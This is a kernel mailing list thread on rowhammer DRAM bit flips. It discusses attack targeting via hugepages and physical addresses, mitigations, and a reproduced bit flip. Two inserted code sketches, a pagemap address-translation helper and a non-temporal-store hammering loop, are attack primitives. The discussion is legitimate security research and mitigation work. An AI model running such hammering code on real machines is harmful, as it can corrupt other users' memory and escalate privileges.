physical addresses, so you can at least target the kernel a little bit. I *think* that kASLR helps a little bit here. --Andy > -- > Kirill A. Shutemov -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 2:26 ` Andy Lutomirski @ 2015-01-08 13:03 ` One Thousand Gnomes 2015-01-08 16:52 ` Pavel Machek 2015-01-09 15:50 ` Vlastimil Babka 0 siblings, 2 replies; 29+ messages in thread From: One Thousand Gnomes @ 2015-01-08 13:03 UTC (permalink / raw) To: Andy Lutomirski Cc: Kirill A. Shutemov, Pavel Machek, Mark Seaborn, kernel list On Mon, 5 Jan 2015 18:26:07 -0800 Andy Lutomirski <luto@amacapital.net> wrote: > On Mon, Jan 5, 2015 at 6:18 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > > On Mon, Jan 05, 2015 at 05:57:24PM -0800, Andy Lutomirski wrote: > >> On Mon, Jan 5, 2015 at 5:47 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > >> > On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: > >> >> On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes > >> >> <gnomes@lxorguk.ukuu.org.uk> wrote: > >> >> >> In the meantime, I created test that actually uses physical memory, > >> >> >> 8MB apart, as described in some footnote. It is attached. It should > >> >> >> work, but it needs boot with specific config options and specific > >> >> >> kernel parameters. > >> >> > > >> >> > Why not just use hugepages. You know the alignment guarantees for 1GB > >> >> > pages and that means you don't even need to be root > >> >> > > >> >> > In fact - should we be disabling 1GB huge page support by default at this > >> >> > point, at least on non ECC boxes ? > >> >> > >> >> Can you actually damage anyone else's data using a 1 GB hugepage? > >> > > >> > hugetlbfs is a filesystem: the answer is yes. Although I don't see the > >> > issue as a big attach vector. > >> > >> What I mean is: if I map a 1 GB hugepage and rowhammer it, is it > >> likely that the corruption will be confined to the same 1 GB? > > > > I don't know for sure, but it looks likely to me according to claim in the > > paper (8MB). But it still can be sombody else's data: 644 file on > > hugetlbfs mmap()ed r/o by anyone. Thats less of a concern I think. As far as I can tell it would depend how the memory is wired what actually gets hit. I'm not clear if its within the range or not. > > When I read the paper I thought that vdso would be interesting target for > > the attack, but having all these constrains in place, it's hard aim the > > attack anything widely used. > > > > The vdso and the vvar page are both at probably-well-known physical > addresses, so you can at least target the kernel a little bit. I > *think* that kASLR helps a little bit here. SMEP likewise if you were able to use 1GB to corrupt matching lines elsewhere in RAM (eg the syscall table), but that would I think depend how the RAM is physically configured. Thats why the large TLB case worries me. With 4K pages and to an extent with 2MB pages its actually quite hard to line up an attack if you know something about the target. With 1GB hugepages you control the lower bits of the physical address precisely. The question is whether that merely enables you to decide where to shoot yourself or it goes beyond that ? (Outside HPC anyway: for HPC cases it bites both ways I suspect - you've got the ability to ensure you don't hit those access patterns while using 1GB pages, but also nothing to randomise stuff to make them unlikely if you happen to have worst case aligned data). ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-08 13:03 ` One Thousand Gnomes @ 2015-01-08 16:52 ` Pavel Machek 2015-01-09 15:50 ` Vlastimil Babka 1 sibling, 0 replies; 29+ messages in thread From: Pavel Machek @ 2015-01-08 16:52 UTC (permalink / raw) To: One Thousand Gnomes Cc: Andy Lutomirski, Kirill A. Shutemov, Mark Seaborn, kernel list On Thu 2015-01-08 13:03:25, One Thousand Gnomes wrote: > On Mon, 5 Jan 2015 18:26:07 -0800 > Andy Lutomirski <luto@amacapital.net> wrote: > > > I don't know for sure, but it looks likely to me according to claim in the > > > paper (8MB). But it still can be sombody else's data: 644 file on > > > hugetlbfs mmap()ed r/o by anyone. > > Thats less of a concern I think. As far as I can tell it would depend how > the memory is wired what actually gets hit. I'm not clear if its within > the range or not. I think it can hit outside the specified area, yes. > > > When I read the paper I thought that vdso would be interesting target for > > > the attack, but having all these constrains in place, it's hard aim the > > > attack anything widely used. > > > > > > > The vdso and the vvar page are both at probably-well-known physical > > addresses, so you can at least target the kernel a little bit. I > > *think* that kASLR helps a little bit here. > > SMEP likewise if you were able to use 1GB to corrupt matching lines > elsewhere in RAM (eg the syscall table), but that would I think depend > how the RAM is physically configured. > > Thats why the large TLB case worries me. With 4K pages and to an extent > with 2MB pages its actually quite hard to line up an attack if you know > something about the target. With 1GB hugepages you control the lower bits > of the physical address precisely. The question is whether that merely > enables you to decide where to shoot yourself or it goes beyond that > ? I think you shoot pretty much randomly. Some cells are more likely to flip, some are less likely, but that depends on concrete DRAM chip. > (Outside HPC anyway: for HPC cases it bites both ways I suspect - you've > got the ability to ensure you don't hit those access patterns while using > 1GB pages, but also nothing to randomise stuff to make them unlikely if > you happen to have worst case aligned data). I don't think it is a problem for HPC. You really can't do this by accident. You need very specific pattern of DRAM accesses. Get it 10 times slower, and DRAM can handle that. Actually, I don't think you can trigger it without performing the cache flushing instructions. Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-08 13:03 ` One Thousand Gnomes 2015-01-08 16:52 ` Pavel Machek @ 2015-01-09 15:50 ` Vlastimil Babka 2015-01-09 16:31 ` Pavel Machek 1 sibling, 1 reply; 29+ messages in thread From: Vlastimil Babka @ 2015-01-09 15:50 UTC (permalink / raw) To: One Thousand Gnomes, Andy Lutomirski Cc: Kirill A. Shutemov, Pavel Machek, Mark Seaborn, kernel list On 01/08/2015 02:03 PM, One Thousand Gnomes wrote: > On Mon, 5 Jan 2015 18:26:07 -0800 > Andy Lutomirski <luto@amacapital.net> wrote: > > Thats less of a concern I think. As far as I can tell it would depend how > the memory is wired what actually gets hit. I'm not clear if its within > the range or not. > >> > When I read the paper I thought that vdso would be interesting target for >> > the attack, but having all these constrains in place, it's hard aim the >> > attack anything widely used. >> > >> >> The vdso and the vvar page are both at probably-well-known physical >> addresses, so you can at least target the kernel a little bit. I >> *think* that kASLR helps a little bit here. > > SMEP likewise if you were able to use 1GB to corrupt matching lines > elsewhere in RAM (eg the syscall table), but that would I think depend > how the RAM is physically configured. > > Thats why the large TLB case worries me. With 4K pages and to an extent > with 2MB pages its actually quite hard to line up an attack if you know > something about the target. With 1GB hugepages you control the lower bits > of the physical address precisely. The question is whether that merely > enables you to decide where to shoot yourself or it goes beyond that ? I haven't read the details yet to judge if it's feasible in this case, but even without hugepages, it's possible (albeit elaborately) to control physical mapping from userspace. I've done this in the past, to have optimal mapping (basically page coloring) to L2/L3 caches. It was done by allocating bunch of memory, determining its physical addresses from /proc/self/pagemap, and then rearanging it via mremap. Then it's also quite trivial to induce cache misses without clflush, using just few addresses that map to the same cache set, without having to cycle throuh more memory than the cache size is. But as I said, I haven't read the details here to see if the required access pattern to corrupt ram can be combined with these kinds of tricks... > (Outside HPC anyway: for HPC cases it bites both ways I suspect - you've > got the ability to ensure you don't hit those access patterns while using > 1GB pages, but also nothing to randomise stuff to make them unlikely if > you happen to have worst case aligned data). > > -- > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ > ^ permalink raw reply [flat|nested] 29+ messages in thread
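
The pagemap lookup described above amounts to roughly the sketch below
(helper name invented). It relies on unprivileged reads of
/proc/self/pagemap returning the PFN, which was still the case on
kernels of this era; newer kernels hide the PFN without CAP_SYS_ADMIN:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

/* Translate one of this process's virtual addresses to a physical
   address via /proc/self/pagemap: one 64-bit entry per page, PFN in
   bits 0-54, bit 63 = page present.  Returns 0 on failure. */
static uint64_t virt_to_phys(void *virt)
{
	long psize = sysconf(_SC_PAGESIZE);
	uint64_t entry = 0;
	int fd = open("/proc/self/pagemap", O_RDONLY);

	if (fd < 0)
		return 0;
	pread(fd, &entry, sizeof(entry),
	      ((uint64_t)(uintptr_t)virt / psize) * sizeof(entry));
	close(fd);
	if (!(entry & (1ULL << 63)))
		return 0;
	return (entry & ((1ULL << 55) - 1)) * psize + (uintptr_t)virt % psize;
}

int main(void)
{
	char *buf = malloc(4096);

	buf[0] = 1;	/* fault the page in so it has a PFN */
	printf("virt %p -> phys 0x%llx\n", buf,
	       (unsigned long long)virt_to_phys(buf));
	return 0;
}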
* Re: DRAM unreliable under specific access patern 2015-01-09 15:50 ` Vlastimil Babka @ 2015-01-09 16:31 ` Pavel Machek 0 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2015-01-09 16:31 UTC (permalink / raw) To: Vlastimil Babka Cc: One Thousand Gnomes, Andy Lutomirski, Kirill A. Shutemov, Mark Seaborn, kernel list Hi! > Then it's also quite trivial to induce cache misses without clflush, using just > few addresses that map to the same cache set, without having to cycle throuh > more memory than the cache size is. Hmm. If you can do "clflush" without "clflush", and result is no more then 10 times slower than "clflush", you can probably break it. Might need two DIMMs so that you can use one to flush caches while row-hammering the other one. Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-05 19:23 ` One Thousand Gnomes 2015-01-05 19:50 ` Andy Lutomirski @ 2015-01-06 23:20 ` Pavel Machek 2015-03-09 16:03 ` Mark Seaborn 1 sibling, 1 reply; 29+ messages in thread From: Pavel Machek @ 2015-01-06 23:20 UTC (permalink / raw) To: One Thousand Gnomes; +Cc: Mark Seaborn, kernel list, luto On Mon 2015-01-05 19:23:29, One Thousand Gnomes wrote: > > In the meantime, I created test that actually uses physical memory, > > 8MB apart, as described in some footnote. It is attached. It should > > work, but it needs boot with specific config options and specific > > kernel parameters. > > Why not just use hugepages. You know the alignment guarantees for 1GB > pages and that means you don't even need to be root > > In fact - should we be disabling 1GB huge page support by default at this > point, at least on non ECC boxes ? Actually, I could not get my test code to run; and as code from https://github.com/mseaborn/rowhammer-test reproduces issue for me, I stopped trying. I could not get it to damage memory of other process than itself (but that should be possible), I guess that's next thing to try. Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 23:20 ` Pavel Machek @ 2015-03-09 16:03 ` Mark Seaborn 2015-03-09 16:30 ` Andy Lutomirski 0 siblings, 1 reply; 29+ messages in thread From: Mark Seaborn @ 2015-03-09 16:03 UTC (permalink / raw) To: Pavel Machek, kernel list; +Cc: One Thousand Gnomes, luto On 6 January 2015 at 15:20, Pavel Machek <pavel@ucw.cz> wrote: > On Mon 2015-01-05 19:23:29, One Thousand Gnomes wrote: > > > In the meantime, I created test that actually uses physical memory, > > > 8MB apart, as described in some footnote. It is attached. It should > > > work, but it needs boot with specific config options and specific > > > kernel parameters. > > > > Why not just use hugepages. You know the alignment guarantees for 1GB > > pages and that means you don't even need to be root > > > > In fact - should we be disabling 1GB huge page support by default at this > > point, at least on non ECC boxes ? > > Actually, I could not get my test code to run; and as code from > > https://github.com/mseaborn/rowhammer-test > > reproduces issue for me, I stopped trying. I could not get it to > damage memory of other process than itself (but that should be > possible), I guess that's next thing to try. FYI, rowhammer-induced bit flips do turn out to be exploitable. Here are the results of my research on this: http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html Cheers, Mark ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-03-09 16:03 ` Mark Seaborn @ 2015-03-09 16:30 ` Andy Lutomirski 2015-03-09 21:17 ` Pavel Machek 0 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2015-03-09 16:30 UTC (permalink / raw) To: Mark Seaborn; +Cc: Pavel Machek, kernel list, One Thousand Gnomes On Mon, Mar 9, 2015 at 9:03 AM, Mark Seaborn <mseaborn@chromium.org> wrote: > On 6 January 2015 at 15:20, Pavel Machek <pavel@ucw.cz> wrote: >> On Mon 2015-01-05 19:23:29, One Thousand Gnomes wrote: >> > > In the meantime, I created test that actually uses physical memory, >> > > 8MB apart, as described in some footnote. It is attached. It should >> > > work, but it needs boot with specific config options and specific >> > > kernel parameters. >> > >> > Why not just use hugepages. You know the alignment guarantees for 1GB >> > pages and that means you don't even need to be root >> > >> > In fact - should we be disabling 1GB huge page support by default at this >> > point, at least on non ECC boxes ? >> >> Actually, I could not get my test code to run; and as code from >> >> https://github.com/mseaborn/rowhammer-test >> >> reproduces issue for me, I stopped trying. I could not get it to >> damage memory of other process than itself (but that should be >> possible), I guess that's next thing to try. > > FYI, rowhammer-induced bit flips do turn out to be exploitable. Here > are the results of my research on this: > http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html > IIRC non-temporal writes will force cachelines out to main memory *and* invalidate them. (I wouldn't be shocked if Skylake changes this, but I'm reasonably confident that it's true on all currently available Intel chips.) Have you checked whether read; read; nt store; nt store works? (I can't test myself easily right now -- I think my laptop is too old for this issue.) --Andy ^ permalink raw reply [flat|nested] 29+ messages in thread
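
For anyone wanting to try that against a known-bad address pair, an
untested sketch of the "read; read; nt store; nt store" variant is
below (helper name invented). It writes back the values it just read,
so the hammered lines' contents stay the same; whether movnti evicts
the lines aggressively enough to hammer is exactly the open question:

/* Hammer two addresses with loads followed by non-temporal stores
   (movnti) instead of clflush -- an untested variant of the clflush
   loop used elsewhere in this thread. */
static void hammer_nt(volatile int *w1, volatile int *w2)
{
	unsigned int i;

	for (i = 0; i < 0x1000000; i++) {
		__asm__ __volatile__(
			"movl 0(%0), %%eax \n"
			"movl 0(%1), %%ebx \n"
			"movnti %%eax, 0(%0) \n"
			"movnti %%ebx, 0(%1) \n"
			"mfence"
			:: "r" (w1), "r" (w2) : "eax", "ebx", "memory");
	}
}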
* Re: DRAM unreliable under specific access patern 2015-03-09 16:30 ` Andy Lutomirski @ 2015-03-09 21:17 ` Pavel Machek 2015-03-09 21:37 ` Mark Seaborn 0 siblings, 1 reply; 29+ messages in thread From: Pavel Machek @ 2015-03-09 21:17 UTC (permalink / raw) To: Andy Lutomirski; +Cc: Mark Seaborn, kernel list, One Thousand Gnomes On Mon 2015-03-09 09:30:50, Andy Lutomirski wrote: > On Mon, Mar 9, 2015 at 9:03 AM, Mark Seaborn <mseaborn@chromium.org> wrote: > > On 6 January 2015 at 15:20, Pavel Machek <pavel@ucw.cz> wrote: > >> On Mon 2015-01-05 19:23:29, One Thousand Gnomes wrote: > >> > > In the meantime, I created test that actually uses physical memory, > >> > > 8MB apart, as described in some footnote. It is attached. It should > >> > > work, but it needs boot with specific config options and specific > >> > > kernel parameters. > >> > > >> > Why not just use hugepages. You know the alignment guarantees for 1GB > >> > pages and that means you don't even need to be root > >> > > >> > In fact - should we be disabling 1GB huge page support by default at this > >> > point, at least on non ECC boxes ? > >> > >> Actually, I could not get my test code to run; and as code from > >> > >> https://github.com/mseaborn/rowhammer-test > >> > >> reproduces issue for me, I stopped trying. I could not get it to > >> damage memory of other process than itself (but that should be > >> possible), I guess that's next thing to try. > > > > FYI, rowhammer-induced bit flips do turn out to be exploitable. Here > > are the results of my research on this: > > http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html > > > > IIRC non-temporal writes will force cachelines out to main memory > *and* invalidate them. (I wouldn't be shocked if Skylake changes > this, but I'm reasonably confident that it's true on all currently > available Intel chips.) > > Have you checked whether read; read; nt store; nt store works? > > (I can't test myself easily right now -- I think my laptop is too old > for this issue.) Well, if you had laptop with that issue, it would still be tricky to test this. It takes a while to reproduce... Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-03-09 21:17 ` Pavel Machek @ 2015-03-09 21:37 ` Mark Seaborn 0 siblings, 0 replies; 29+ messages in thread From: Mark Seaborn @ 2015-03-09 21:37 UTC (permalink / raw) To: Pavel Machek; +Cc: Andy Lutomirski, kernel list, One Thousand Gnomes On 9 March 2015 at 14:17, Pavel Machek <pavel@ucw.cz> wrote: > On Mon 2015-03-09 09:30:50, Andy Lutomirski wrote: >> On Mon, Mar 9, 2015 at 9:03 AM, Mark Seaborn <mseaborn@chromium.org> wrote: >> > On 6 January 2015 at 15:20, Pavel Machek <pavel@ucw.cz> wrote: >> >> Actually, I could not get my test code to run; and as code from >> >> >> >> https://github.com/mseaborn/rowhammer-test >> >> >> >> reproduces issue for me, I stopped trying. I could not get it to >> >> damage memory of other process than itself (but that should be >> >> possible), I guess that's next thing to try. >> > >> > FYI, rowhammer-induced bit flips do turn out to be exploitable. Here >> > are the results of my research on this: >> > http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html >> > >> >> IIRC non-temporal writes will force cachelines out to main memory >> *and* invalidate them. (I wouldn't be shocked if Skylake changes >> this, but I'm reasonably confident that it's true on all currently >> available Intel chips.) >> >> Have you checked whether read; read; nt store; nt store works? >> >> (I can't test myself easily right now -- I think my laptop is too old >> for this issue.) > > Well, if you had laptop with that issue, it would still be tricky to > test this. It takes a while to reproduce... Actually, it depends. The time it takes to get a rowhammer-induced bit flip when picking aggressor addresses at random varies quite a lot between machines. On some machines, it takes minutes. On others, it takes hours. However, once you've found a bad DRAM location, the bit flips do tend to be repeatable. So it is possible to record the physical addresses of aggressor and victim locations (using /proc/self/pagemap) and retry them later, potentially using different methods for attempting to do row hammering (such as CLFLUSH vs. non-temporal accesses). I have not actually tried that with methods other than CLFLUSH yet. I tried using non-temporal accesses early on in my experimentation, but I didn't try them with known-bad locations. Cheers, Mark ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern [not found] <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com> 2014-12-24 22:08 ` Pavel Machek @ 2014-12-24 22:27 ` Pavel Machek 2014-12-24 23:41 ` Pavel Machek 2 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-24 22:27 UTC (permalink / raw) To: Mark Seaborn, kernel list; +Cc: luto On Wed 2014-12-24 11:47:50, Mark Seaborn wrote: > Hi Pavel, > > Try this test program: https://github.com/mseaborn/rowhammer-test > > It has reproduced bit flips on various machines. > > Your program won't be an effective test because you're just hammering > addresses x and x+64, which will typically be in the same row of DRAM. > > For the test to be effective, you have to pick addresses that are in > different rows but in the same bank. A good way of doing that is just to > pick random pairs of addresses (as the test program above does). If the > machine has 16 banks of DRAM (as many of the machines I've tested on do), > there will be a 1/16 chance that the two addresses are in the same bank. > > [Replying off-list just because I'm not subscribed to lkml and only saw > this thread via the web, but feel free to reply on the list. :-) ] Ok, so I thought my machine is too old to be affected. Apparently, it is not :-(. (With rowhammer-test). Iteration 140 (after 328.76s) 48.805 nanosec per iteration: 2.1084 sec for 43200000 iterations check error at 0x890f1118: got 0xfeffffffffffffff (check took 0.244179s) ** exited with status 256 (0x100) processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Duo CPU E7400 @ 2.80GHz stepping : 10 microcode : 0xa07 cpu MHz : 1596.000 cache size : 3072 KB Pavel > Cheers, > Mark > > Pavel Machek <pavel <at> ucw.cz> wrote: > > On Wed 2014-12-24 09:13:32, Andy Lutomirski wrote: > > > On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel <at> ucw.cz> wrote: > > > > Hi! > > > > > > > > It seems that it is easy to induce DRAM bit errors by doing repeated > > > > reads from adjacent memory cells on common hw. Details are at > > > > > > > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > > > > > > > > . Older memory modules seem to work better, and ECC should detect > > > > this. Paper has inner loop that should trigger this. > > > > > > > > Workarounds seem to be at hardware level, and tricky, too. > > > > > > One mostly-effective solution would be to stop buying computers > > > without ECC. Unfortunately, no one seems to sell non-server chips > > > that can do ECC. > > > > Or keep using old computers . > > > > > > Does anyone have implementation of detector? Any ideas how to work > > > > around it in software? > > > > > > > > > > Platform-dependent page coloring with very strict, and impossible to > > > implement fully correctly, page allocation constraints? > > > > This seems to be at cacheline level, not at page level, if I > > understand it correctly. > > > > So the problem would is: I have something mapped read-only, and I can > > still cause bitflips in it. > > > > Hmm. So it is pretty obviously a security problem, no need for > > java. Just do some bit flips in binary root is going to run, and it > > will crash for him. You can map binaries read-only, so you have enough > > access. > > > > As far as I understand it, attached program could reproduce it on > > affected machines? 
-- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern [not found] <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com> 2014-12-24 22:08 ` Pavel Machek 2014-12-24 22:27 ` Pavel Machek @ 2014-12-24 23:41 ` Pavel Machek [not found] ` <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com> 2014-12-28 22:48 ` Mark Seaborn 2 siblings, 2 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-24 23:41 UTC (permalink / raw) To: Mark Seaborn, kernel list; +Cc: luto Hi! > > Try this test program: https://github.com/mseaborn/rowhammer-test > > It has reproduced bit flips on various machines. > > Your program won't be an effective test because you're just hammering > addresses x and x+64, which will typically be in the same row of DRAM. > > For the test to be effective, you have to pick addresses that are in > different rows but in the same bank. A good way of doing that is just to > pick random pairs of addresses (as the test program above does). If the > machine has 16 banks of DRAM (as many of the machines I've tested on do), > there will be a 1/16 chance that the two addresses are in the same > bank. Ok. Row size is something like 8MB, right? So we have a program that corrupts basically random memory on many machines. That is not good. That means that unpriviledged user can crash processes of other users. I relies on hammering DRAM rows so fast that refresh is unable to keep data consistent in adjacent rows. It relies on clflush: without that, it would likely not be possible to force fast enough row switches. Unfortunately, clflush is not a priviledged instruction. Bad Intel. Flushing cache seems to be priviledged on ARM (mcr p15). That means it is probably impossible to exploit on ARM based machines. We could make DRAM refresh faster. That will incur performance penalty (<10%?), and is probably chipset-specific...? Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
[parent not found: <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com>]
* Re: DRAM unreliable under specific access patern [not found] ` <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com> @ 2014-12-25 9:23 ` Pavel Machek 0 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-25 9:23 UTC (permalink / raw) To: Bastien ROUCARIES, secure; +Cc: luto, Mark Seaborn, kernel list On Thu 2014-12-25 09:26:41, Bastien ROUCARIES wrote: > Le 25 déc. 2014 00:42, "Pavel Machek" <pavel@ucw.cz> a écrit : > > > > Hi! > > > > > > Try this test program: https://github.com/mseaborn/rowhammer-test > > > > > > It has reproduced bit flips on various machines. > > > > > > Your program won't be an effective test because you're just hammering > > > addresses x and x+64, which will typically be in the same row of DRAM. > > > > > > For the test to be effective, you have to pick addresses that are in > > > different rows but in the same bank. A good way of doing that is just > to > > > pick random pairs of addresses (as the test program above does). If the > > > machine has 16 banks of DRAM (as many of the machines I've tested on > do), > > > there will be a 1/16 chance that the two addresses are in the same > > > bank. > > > > Ok. Row size is something like 8MB, right? > > > > So we have a program that corrupts basically random memory on many > > machines. That is not good. That means that unpriviledged user can > > crash processes of other users. > > > > I relies on hammering DRAM rows so fast that refresh is unable to keep > > data consistent in adjacent rows. It relies on clflush: without that, > > it would likely not be possible to force fast enough row switches. > > > > Unfortunately, clflush is not a priviledged instruction. Bad Intel. > > > > Ask a microcode update asking clflush to be penalized in userspace. Indeed. Optionally making clflush priviledged intstruction, or artifically make that instruction slower could do the trick. Alternatively, lowering memory refresh intervals would reliably do the same, but with bigger overhead. I guess documenting that controls for common chipsets would do the trick, so kernel can adjust values before starting userspace. Thanks, Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 23:41 ` Pavel Machek [not found] ` <CAE2SPAa-tBFk0gnOhEZiriQA7bv6MmL9HGqAMSceUKKqujBDPQ@mail.gmail.com> @ 2014-12-28 22:48 ` Mark Seaborn 1 sibling, 0 replies; 29+ messages in thread From: Mark Seaborn @ 2014-12-28 22:48 UTC (permalink / raw) To: Pavel Machek; +Cc: kernel list, luto On 24 December 2014 at 15:41, Pavel Machek <pavel@ucw.cz> wrote: > > Try this test program: https://github.com/mseaborn/rowhammer-test > > > > It has reproduced bit flips on various machines. ... > So we have a program that corrupts basically random memory on many > machines. That is not good. That means that unpriviledged user can > crash processes of other users. ... > We could make DRAM refresh faster. That will incur performance > penalty (<10%?), and is probably chipset-specific...? Some machines already double the DRAM refresh rate in some cases. For example, a presentation from Intel says: "When non-pTRR compliant DIMMs are used, the E5-2600 v2 system defaults into double refresh mode, which has longer memory latency/DIMM access latency and can lower memory bandwidth by up to 2-4%. ... * DDR3 DIMMs are affected by a pass gate charge migration issue (also known as Row Hammer) that may result in a memory error. * The Pseudo Target Row Refresh (pTRR) feature introduced on Ivy Bridge processor families (2S/4S E5 v2, E7 v2) helps mitigate the DDR3 pass gate issue by automatically refreshing victim rows." -- from http://infobazy.gda.pl/2014/pliki/prezentacje/d2s2e4-Kaczmarski-Optymalna.pdf ("Thoughts on Intel Xeon E5-2600 v2 Product Family Performance Optimisation – component selection guidelines", August 2014, Marcin Kaczmarski) Note that Target Row Refresh (TRR) is a DRAM feature that was added to the recently-published LPDDR4 standard (where "LP" = "Low Power"). See http://www.jedec.org/standards-documents/results/jesd209-4 (registration is required to download the spec, but it's free). TRR is basically a request that the CPU's memory controller can send to a DRAM module to ask it to refresh a row's neighbours. I am not sure how Pseudo TRR differs from TRR, though. That presentation mentions one CPU (or CPU family), but I don't know which other CPUs support these features (i.e. doubling the refresh rate and/or using pTRR). Even if a CPU supports these features, it is difficult to determine whether a machine's BIOS enables them. It is the BIOS's responsibility to configure the CPU's memory controller at startup. Also, it is not clear how much doubling the DRAM refresh rate would help prevent rowhammer-induced bit flips. Yoongu Kim et al's paper shows that, for some DRAM modules, a refresh period of 32ms (instead of the usual 64ms) is not short enough to reduce the error rate to zero. See Figure 4 in http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf. I expect that doubling the refresh rate is useful for reliability, but not necessarily security. It would prevent accidental bit flips caused by accidental row hammering, where programs accidentally generate a lot of cache misses without using CLFLUSH. But it might not prevent a determined attacker from generating bit flips that might be used for taking control of a system. Cheers, Mark ^ permalink raw reply [flat|nested] 29+ messages in thread